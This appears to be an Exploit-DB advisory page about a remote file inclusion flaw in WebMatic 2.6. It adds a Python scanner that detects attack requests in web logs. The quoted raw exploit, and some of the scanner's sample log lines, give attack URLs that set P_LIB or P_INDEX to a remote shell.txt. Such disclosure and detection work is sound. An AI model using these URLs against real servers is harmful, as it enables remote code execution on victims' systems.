Vendor: WebMatic
By: MadNet
CVSS: 7.5 (HIGH)
CWE: RFI
Product Name: WebMatic
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WebMatic 2.6

WebMatic 2.6 is vulnerable to remote file inclusion (RFI). The script core/index/index_album.php builds its require() paths from the P_LIB and P_INDEX variables, which can be set through the query string. This allows an attacker to include arbitrary files from remote servers, potentially leading to remote code execution.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to upgrade to a newer version or apply security measures such as input validation and output encoding to prevent RFI attacks.
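
One way to spot requests matching this advisory in web server logs, as an added example that is not part of the original advisory or of WebMatic: it flags requests to index_album.php whose P_LIB or P_INDEX value decodes to a URL. The combined log format, the example hosts and the function names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "/core/index/index_album.php"   # script named in the advisory
PARAMS = {"P_LIB", "P_INDEX"}            # variables passed to require()
# A value starting with "scheme://" points require() at a stream wrapper or remote host.
REMOTE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding (double-encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return sorted names of P_LIB/P_INDEX parameters whose value looks remote."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not decode(url.path).lower().endswith(SCRIPT):
        return []
    hits = set()
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in PARAMS and REMOTE.search(decode(value)):
            hits.add(name)
    return sorted(hits)

def scan(lines):
    """Return (line_number, flagged_params) for every matching log line."""
    results = []
    for number, line in enumerate(lines, 1):
        flagged = suspicious_params(line)
        if flagged:
            results.append((number, flagged))
    return results

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Feb/2007:10:01:12 +0000] "GET /webmatic/core/index/index_album.php?album=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Feb/2007:10:02:40 +0000] "GET /webmatic/core/index/index_album.php?P_LIB=http://files.example.net/shell.txt HTTP/1.1" 200 312',
    '203.0.113.9 - - [07/Feb/2007:10:02:55 +0000] "GET /webmatic/core/index/index_album.php?P_INDEX=http%253A%252F%252Ffiles.example.net%252Fshell.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [07/Feb/2007:10:03:01 +0000] "GET /webmatic/index.php?page=album HTTP/1.1" 200 8841',
]
```

Calling `scan(SAMPLE_LOG)` reports lines 2 and 3; neither variable should ever arrive in a request, so any hit is worth investigating.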
Source

Exploit-DB raw data:

-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6

#Author : MadNet

#Contact : MadNet[at]Hackertr[Dot]org

#S.Page : www.valarsoft.com  :)

--------------------------------------*******************-----------------------------------------------------------


Error1 :  require($P_LIB."lib_album.php");

Error2 :  require($P_INDEX."page_album.inc");


[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]

-------------------------------------------------

Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt



''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

-- MadNet From Turkey & Cyber-Sabotger Orgeneral  --


--Thanks Milw0rm

# milw0rm.com [2007-02-07]